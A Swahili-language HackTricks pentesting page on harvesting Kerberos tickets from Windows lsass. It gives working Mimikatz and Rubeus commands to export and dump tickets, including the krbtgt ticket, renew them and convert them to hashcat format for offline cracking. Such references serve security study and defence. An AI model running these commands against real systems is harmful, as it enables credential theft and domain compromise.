4.2 KiB
Kuvuna tiketi kutoka kwa Windows
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi wa PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.
Tiketi kwenye Windows zinasimamiwa na kuhifadhiwa na mchakato wa lsass (Local Security Authority Subsystem Service), ambao unahusika na kushughulikia sera za usalama. Ili kuvuna tiketi hizi, ni lazima kuwasiliana na mchakato wa lsass. Mtumiaji asiye na mamlaka anaweza tu kupata tiketi zao wenyewe, wakati msimamizi ana uwezo wa kuvuna tiketi zote kwenye mfumo. Kwa operesheni kama hizo, zana za Mimikatz na Rubeus zinatumika sana, kila moja ikiwa na amri na utendaji tofauti.
Mimikatz
Mimikatz ni zana yenye uwezo ambayo inaweza kuingiliana na usalama wa Windows. Inatumika sio tu kwa kuvuna tiketi lakini pia kwa operesheni mbalimbali zinazohusiana na usalama.
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
Rubeus
Rubeus ni chombo kilichoundwa mahsusi kwa ajili ya mwingiliano na udhibiti wa Kerberos. Hutumika kwa ajili ya kuchota na kushughulikia tiketi, pamoja na shughuli nyingine zinazohusiana na Kerberos.
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
Unapotumia amri hizi, hakikisha kubadilisha nafasi zilizowekwa kama <BASE64_TICKET>
na <luid>
na tiketi iliyosimbwa kwa Base64 na Kitambulisho cha Ingia mtawaliwa. Zana hizi zinatoa utendaji mpana kwa kusimamia tiketi na kuingiliana na mifumo ya usalama ya Windows.
Marejeo
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.